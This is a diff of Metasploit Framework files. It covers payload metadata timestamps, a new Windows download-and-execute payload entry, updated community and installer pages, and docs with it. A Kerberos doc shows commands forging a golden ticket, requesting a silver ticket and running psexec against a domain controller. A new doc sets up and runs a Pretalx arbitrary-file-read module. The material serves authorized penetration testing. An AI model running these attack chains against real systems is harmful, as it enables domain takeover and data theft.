    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -246743,7 +247794,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -246776,7 +247827,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -246809,7 +247860,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -246842,7 +247893,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -246875,7 +247926,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -246908,7 +247959,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -247208,7 +248259,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -247241,7 +248292,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -247274,7 +248325,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -248138,7 +249189,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -248171,7 +249222,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -248204,7 +249255,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -248235,7 +249286,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/metsvc_bind_tcp",
@@ -248266,7 +249317,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/metsvc_reverse_tcp",
@@ -248895,7 +249946,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -248928,7 +249979,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -248961,7 +250012,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -249290,7 +250341,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_http",
@@ -249324,7 +250375,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_https",
@@ -249358,7 +250409,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_tcp",
@@ -250089,7 +251140,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -250122,7 +251173,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -250155,7 +251206,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -251023,7 +252074,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "php/meterpreter_reverse_tcp",
@@ -257012,7 +258063,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_named_pipe",
@@ -257047,7 +258098,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_tcp",
@@ -257082,7 +258133,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_http",
@@ -257117,7 +258168,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_https",
@@ -257152,7 +258203,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -257187,7 +258238,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_tcp",
@@ -257218,7 +258269,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/metsvc_bind_tcp",
@@ -257249,7 +258300,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/metsvc_reverse_tcp",
@@ -262520,6 +263571,37 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_windows/x64/download_exec": {
+    "name": "Windows Download Execute",
+    "fullname": "payload/windows/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Downloads and executes the file from the specified url.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-08-12 11:39:44 +0000",
+    "path": "/modules/payloads/singles/windows/x64/download_exec.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_windows/x64/encrypted_shell/reverse_tcp": {
    "name": "Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/windows/x64/encrypted_shell/reverse_tcp",
@@ -263247,7 +264329,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_bind_named_pipe",
@@ -263282,7 +264364,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_bind_tcp",
@@ -263317,7 +264399,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_http",
@@ -263352,7 +264434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_https",
@@ -263387,7 +264469,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp",
@@ -263422,7 +264504,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_tcp",
@@ -1 +1 @@
-3.2.5
+3.3.8
@@ -1,18 +1,38 @@
-# Chat
+# Primary Communication Channels

-A lot of our discussion happens on IRC in #metasploit on Freenode.
+## GitHub Discussions
+For community support, questions, and general discussion, visit our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions).
+
+## Slack
+Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat with the community and developers.
+
+## GitHub Issues
+Submit bug reports and feature requests through [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues).
+
+# Additional Communication Channels
+
+## Chat
+
+Some community discussion still happens on IRC in #metasploit on Freenode.
 Please be patient and hang around for a while -- not everyone is awake
 at the same time as you. =)

-# Mailing list
+## Mailing list

 The Metasploit development mailing list used to be hosted on SourceForge, but is now on Google Groups. Metasploit Hackers is dead, long live [Metasploit Hackers][list]. (Or [mailto:Metasploit Hackers][mailto]).

 The old list [is archived on seclists.org][archive].

+## Social Media
+
+- **X**: [@metasploit](https://x.com/metasploit)
+- **Mastodon**: [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit)
+- **Blog**: [Rapid7 Blog - Metasploit Tag](https://www.rapid7.com/blog/tag/metasploit/)
+- **YouTube**: [Metasploit YouTube](https://youtube.com/@MetasploitR7)
+
 # Abuse

-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to caitlin_condon@rapid7.com or todb@metasploit.com.
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.


 [archive]: http://seclists.org/metasploit/ "Metasploit mailing list archive"
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 | Download Link                                                                                                                                                |File Type| SHA                                                                                                                       | PGP                                                                                                                      |
 |--------------------------------------------------------------------------------------------------------------------------------------------------------------|-|---------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|
-| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
-| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.8-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
+| [metasploit-4.22.8-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Linux 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.6-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.asc) |
 | [metasploit-4.22.6-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.5-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.asc) |
@@ -142,7 +142,7 @@ Optional options:
    * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
    * `write-only` -- New tickets are requested and they are stored for reuse.
    * `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
-* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
+* `${Prefix}KrbOfferedEncryptionTypes` -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`

 ## Ticket management

@@ -298,14 +298,14 @@ host             service  type                 name  content                   i
 TGS using a previously forged golden ticket:

 ```
-# Forge a golden ticket
+# 1. Forge a golden ticket
 msf auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator

 [*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin
 [*] Auxiliary module execution completed


-# Request a silver ticket:
+# 2. Request a silver ticket:

 msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local
 [*] Running module against 10.10.11.5
@@ -317,7 +317,7 @@ msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5
 [+] 10.10.11.5:88 - Received a valid delegation TGS-Response
 [*] Auxiliary module execution completed

-# Use psexec:
+# 3. Use psexec:

 msf exploit(windows/smb/psexec) > run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1

@@ -90,6 +90,22 @@ a normal user account by analyzing the objects in LDAP.
 1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
 1. The certificate should now be available to be issued by the CA server.

+### Setting up a ESC8 Vulnerable Host
+1. Follow instructions for creating an AD CS enabled server
+1. Select Add Roles and Features
+1. Under "Select Server Roles" expand Active Directory Certificate Services and add `Certificate Enrollment Policy Web Service`, `Certificate Enrollment Web Service`, and `Certificate Authority Web Enrollment`.
+1. For each selection, accept the default for any pop-up.
+1. Accept the default features and install.
+1. When the installation is complete, click on the warning in the Dashboard for post-deployment configuration.
+1. Under Credentials, accept the default
+1. Under Role Services, select `Certificate Authority Web Enrollment`, `Certificate Enrollment Web Service`, and `Certificate Enrollment Policy Web Service`
+1. In CA for CES, accept the defaults
+1. In Authentication Types, accept the default integrated authentication
+1. In Service account for CES, select `Use built-in application pool identity`
+1. Accept default integrated authentication for CEP
+1. Select the domain certificate in Server Certificate (the one that starts with the domain name by default) if more than one appears.
+1. Accept the remaining defaults.
+
 ### Setting up a ESC9 Vulnerable Certificate Template
 1. Open up the run prompt and type in `certsrv`.
 1. In the window that appears you should see your list of certification authorities under `Certification Authority (Local)`.
@@ -240,15 +256,15 @@ if ($editFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) {

 ## Options

-### REPORT_NONENROLLABLE
-If set to `True` then report any certificate templates that are vulnerable but which are not known to be enrollable.
-If set to `False` then skip over these certificate templates and only report on certificate templates
-that are both vulnerable and enrollable.
+### REPORT
+What templates to report (applies filtering to results).

-### REPORT_PRIVENROLLABLE
-If set to `True` then report certificate templates that are only enrollable by the Domain and Enterprise Admins groups.
-If set to `False` then skip over these certificate templates and only report on certificate templates that are
-enrollable by at least one additional user or group.
+* **all** - Report all certificate templates.
+* **published** - Report certificate templates that are published by at least one CA server.
+* **enrollable** - Same as above, but omits templates that the user does not have permissions to enroll in.
+* **vulnerable** - Report certificate templates where at least one misconfiguration is appears to be present.
+* **vulnerable-and-published** - Same as above, but omits templates that are not published by at least one CA server.
+* **vulnerable-and-enrollable** - Same as above, but omits templates that the user does not have permissions to enroll in.

 ## Scenarios

@@ -0,0 +1,177 @@
+## Vulnerable Application
+
+Pretalx is a web-based conference planning tool, used to manage call for paper submissions, talk selection and so on. It used by many major IT conferences - such as OffensiveCon, Hexacon,... Versions 2.3.1 and prior are vulnerable to arbitrary file read, which exploits unsanitized path in schedule export. The module requires set of credentials of Pretalx user and Pretalx needs to have existing conference, where the attacker can submit malicious proposal.
+
+Installation steps:
+
+1. `git clone https://github.com/pretalx/pretalx-docker.git`
+1. Change content of `Dockerfile`:
+```
+FROM python:3.10-bookworm
+
+RUN apt-get update && \
+    apt-get install -y git gettext libmariadb-dev libpq-dev locales libmemcached-dev build-essential \
+            supervisor \
+            sudo \
+            locales \
+            --no-install-recommends && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/* && \
+    dpkg-reconfigure locales && \
+    locale-gen C.UTF-8 && \
+    /usr/sbin/update-locale LANG=C.UTF-8 && \
+    mkdir /etc/pretalx && \
+    mkdir /data && \
+    mkdir /public && \
+    groupadd -g 999 pretalxuser && \
+    useradd -r -u 999 -g pretalxuser -d /pretalx -ms /bin/bash pretalxuser && \
+    echo 'pretalxuser ALL=(ALL) NOPASSWD:SETENV: /usr/bin/supervisord' >> /etc/sudoers
+
+ENV LC_ALL=C.UTF-8
+
+
+COPY pretalx/pyproject.toml /pretalx
+COPY pretalx/src /pretalx/src
+COPY deployment/docker/pretalx.bash /usr/local/bin/pretalx
+COPY deployment/docker/supervisord.conf /etc/supervisord.conf
+
+RUN pip3 install -U pip setuptools wheel typing && \
+    pip3 install -e /pretalx/[mysql,postgres,redis] && \
+    pip3 install pylibmc && \
+    pip3 install gunicorn && \
+    chmod -R 777 /public
+
+
+RUN python3 -m pretalx makemigrations
+RUN python3 -m pretalx migrate
+
+RUN apt-get update && \
+    apt-get install -y curl && \
+    curl -fsSL https://deb.nodesource.com/setup_20.x | bash - && \
+    apt install nodejs npm && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/* && \
+    python3 -m pretalx rebuild
+
+RUN chmod +x /usr/local/bin/pretalx && \
+    cd /pretalx/src && \
+    rm -f pretalx.cfg && \
+    chown -R pretalxuser:pretalxuser /pretalx /data /public && \
+    rm -f /pretalx/src/data/.secret && \
+    cat /public/static/CACHE/css/main.* >> /pretalx/src/static.dist/common/scss/uncompressed.css && \
+    cat /public/static/CACHE/css/main.* >> /pretalx/src/pretalx/static/common/scss/uncompressed.css && \
+    python3 /pretalx/src/manage.py compress --force
+
+USER pretalxuser
+VOLUME ["/etc/pretalx", "/data", "/public"]
+EXPOSE 80
+ENTRYPOINT ["pretalx"]
+CMD ["all"]
+```
+1. Change content of `docker-compose.yml` to following:
+```
+services:
+  pretalx:
+    image: pretalx/standalone:v2.3.1
+      # image: pretalx/dev
+    # build: .
+    container_name: pretalx
+    restart: unless-stopped
+    depends_on:
+      - redis
+      - db
+    environment:
+      # Hint: Make sure you serve all requests for the `/static/` and `/media/` paths when debug is False. See [installation](https://docs.pretalx.org/administrator/installation/#step-7-ssl) for more information
+      PRETALX_FILESYSTEM_MEDIA: /public/media
+      PRETALX_FILESYSTEM_STATIC: /public/static
+    ports:
+      - "80:80"
+    volumes:
+      - ./conf/pretalx.cfg:/etc/pretalx/pretalx.cfg:ro
+      - pretalx-data:/data
+      - pretalx-public:/public
+
+  db:
+    image: docker.io/library/postgres:15-alpine
+    container_name: pretalx-db
+    restart: unless-stopped
+    volumes:
+      - pretalx-database:/var/lib/postgresql/data
+    environment:
+      POSTGRES_PASSWORD: veryunsecureplschange # same password as one that you will put in pretalx.cfg file later on
+      POSTGRES_USER: pretalx
+      POSTGRES_DB: pretalx
+
+  redis:
+    image: redis:latest
+    container_name: pretalx-redis
+    restart: unless-stopped
+    volumes:
+      - pretalx-redis:/data
+
+volumes:
+  pretalx-database:
+  pretalx-data:
+  pretalx-public:
+  pretalx-redis:
+```
+1. `sudo docker-compose up`
+1. Setup username and password - `sudo docker exec -it pretalx pretalx init`
+1. Go to `orga/event/`
+1. Create new conference
+1. Go to `orga/event/[conference name]/schedule/rooms/`
+1. Create a room
+1. Go to `orga/event/[conference name]/`
+1. Make conference go live
+1. `sudo docker exec -u 0 -it pretalx /bin/bash`
+1. Make sure you have correct right on `/data` folder, so `pretalx` user can write export there
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/pretalx_file_read_cve_2023_28459`
+1. Do: `set CONFERENCE_NAME [conference name]`
+1. Do: `set EMAIL [user email]`
+1. Do: `set PASSWORD [password]`
+1. Do: `set RHOSTS [target IP address]`
+1. Do: `run`
+
+## Options
+
+### CONFERENCE_NAME
+
+The slug (shortcut) name of the conference. The module requires existing conference, where an attacker can submit malicious proposal (e.g. conference-secret-2025)
+
+### FILEPATH
+Absolute path to the target file.
+
+### MEDIA_URL
+
